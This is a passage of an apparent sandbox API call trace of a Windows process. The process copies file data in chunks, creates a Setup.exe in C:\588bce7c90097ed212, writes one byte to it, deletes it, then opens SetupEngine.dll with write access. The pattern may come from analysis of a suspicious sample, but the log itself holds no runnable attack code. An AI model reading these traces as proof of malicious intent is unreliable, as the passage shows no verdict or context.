lpOverlapped=0x0) returned 1 [0079.184] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.184] GetLastError () returned 0x0 [0079.185] SetLastError (dwErrCode=0x0) [0079.185] GetLastError () returned 0x0 [0079.185] SetLastError (dwErrCode=0x0) [0079.185] GetLastError () returned 0x0 [0079.185] SetLastError (dwErrCode=0x0) [0079.185] GetLastError () returned 0x0 [0079.185] SetLastError (dwErrCode=0x0) [0079.185] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.185] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.185] GetLastError () returned 0x0 [0079.185] SetLastError (dwErrCode=0x0) [0079.185] GetLastError () returned 0x0 [0079.185] SetLastError (dwErrCode=0x0) [0079.186] GetLastError () returned 0x0 [0079.186] SetLastError (dwErrCode=0x0) [0079.186] GetLastError () returned 0x0 [0079.186] SetLastError (dwErrCode=0x0) [0079.186] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.186] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.186] GetLastError () returned 0x0 [0079.186] SetLastError (dwErrCode=0x0) [0079.186] GetLastError () returned 0x0 [0079.186] SetLastError (dwErrCode=0x0) [0079.186] GetLastError () returned 0x0 [0079.186] SetLastError (dwErrCode=0x0) [0079.187] GetLastError () returned 0x0 [0079.187] SetLastError (dwErrCode=0x0) [0079.187] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.187] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.187] GetLastError () returned 0x0 [0079.187] SetLastError (dwErrCode=0x0) [0079.187] GetLastError () returned 0x0 [0079.187] SetLastError (dwErrCode=0x0) [0079.187] GetLastError () returned 0x0 [0079.187] SetLastError (dwErrCode=0x0) [0079.187] GetLastError () returned 0x0 [0079.187] SetLastError (dwErrCode=0x0) [0079.188] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.188] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.188] GetLastError () returned 0x0 [0079.188] SetLastError (dwErrCode=0x0) [0079.188] GetLastError () returned 0x0 [0079.188] SetLastError (dwErrCode=0x0) [0079.188] GetLastError () returned 0x0 [0079.188] SetLastError (dwErrCode=0x0) [0079.188] GetLastError () returned 0x0 [0079.188] SetLastError (dwErrCode=0x0) [0079.188] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.189] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.189] GetLastError () returned 0x0 [0079.189] SetLastError (dwErrCode=0x0) [0079.189] GetLastError () returned 0x0 [0079.189] SetLastError (dwErrCode=0x0) [0079.189] GetLastError () returned 0x0 [0079.189] SetLastError (dwErrCode=0x0) [0079.189] GetLastError () returned 0x0 [0079.189] SetLastError (dwErrCode=0x0) [0079.189] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.189] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.190] GetLastError () returned 0x0 [0079.190] SetLastError (dwErrCode=0x0) [0079.190] GetLastError () returned 0x0 [0079.190] SetLastError (dwErrCode=0x0) [0079.190] GetLastError () returned 0x0 [0079.190] SetLastError (dwErrCode=0x0) [0079.190] GetLastError () returned 0x0 [0079.190] SetLastError (dwErrCode=0x0) [0079.190] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.190] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.190] GetLastError () returned 0x0 [0079.190] SetLastError (dwErrCode=0x0) [0079.191] GetLastError () returned 0x0 [0079.191] SetLastError (dwErrCode=0x0) [0079.191] GetLastError () returned 0x0 [0079.191] SetLastError (dwErrCode=0x0) [0079.191] GetLastError () returned 0x0 [0079.191] SetLastError (dwErrCode=0x0) [0079.191] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.191] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.191] GetLastError () returned 0x0 [0079.191] SetLastError (dwErrCode=0x0) [0079.191] GetLastError () returned 0x0 [0079.191] SetLastError (dwErrCode=0x0) [0079.192] GetLastError () returned 0x0 [0079.192] SetLastError (dwErrCode=0x0) [0079.192] GetLastError () returned 0x0 [0079.192] SetLastError (dwErrCode=0x0) [0079.192] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.192] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.192] GetLastError () returned 0x0 [0079.192] SetLastError (dwErrCode=0x0) [0079.192] GetLastError () returned 0x0 [0079.192] SetLastError (dwErrCode=0x0) [0079.192] GetLastError () returned 0x0 [0079.192] SetLastError (dwErrCode=0x0) [0079.193] GetLastError () returned 0x0 [0079.193] SetLastError (dwErrCode=0x0) [0079.193] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x148, lpOverlapped=0x0) returned 1 [0079.193] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0079.193] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.193] GetLastError () returned 0x0 [0079.193] SetLastError (dwErrCode=0x0) [0079.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0079.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0079.193] GetLastError () returned 0x0 [0079.193] SetLastError (dwErrCode=0x0) [0079.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0079.193] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327ef70*=0x150, lpOverlapped=0x0) returned 1 [0079.194] GetLastError () returned 0x0 [0079.194] SetLastError (dwErrCode=0x0) [0079.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0079.194] GetLastError () returned 0x0 [0079.194] SetLastError (dwErrCode=0x0) [0079.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0079.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0079.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0079.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0079.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0079.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x93678 | out: hHeap=0x20000) returned 1 [0079.194] CloseHandle (hObject=0x42c) returned 1 [0079.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0079.360] CloseHandle (hObject=0x428) returned 1 [0079.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0079.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0079.364] AreFileApisANSI () returned 1 [0079.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0079.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0079.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0079.371] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0079.372] GetFileType (hFile=0x428) returned 0x1 [0079.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0079.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0079.373] GetLastError () returned 0xb7 [0079.373] SetLastError (dwErrCode=0xb7) [0079.373] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0079.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0079.374] CloseHandle (hObject=0x428) returned 1 [0079.374] AreFileApisANSI () returned 1 [0079.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0079.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0079.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0079.374] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0079.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0079.375] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.375] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.375] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0079.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0079.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0079.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0079.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.376] AreFileApisANSI () returned 1 [0079.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupEngine.dll", lpUsedDefaultChar=0x0) returned 38 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0079.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0079.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0079.377] AreFileApisANSI () returned 1 [0079.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0079.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6ce48 [0079.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0079.377] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0079.377] GetFileType (hFile=0x428) returned 0x1 [0079.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0079.377] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0079.377] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0079.377] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0079.378] CloseHandle (hObject=0x428) returned 1 [0079.378] AreFileApisANSI () returned 1 [0079.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0079.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d528 [0079.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x6d528, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0079.378] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0079.378] GetFileType (hFile=0x428) returned 0x1 [0079.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0079.378] CloseHandle (hObject=0x428) returned 1 [0079.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0079.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0079.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0079.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0079.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0079.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0079.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.379] AreFileApisANSI () returned 1 [0079.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d478 [0079.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 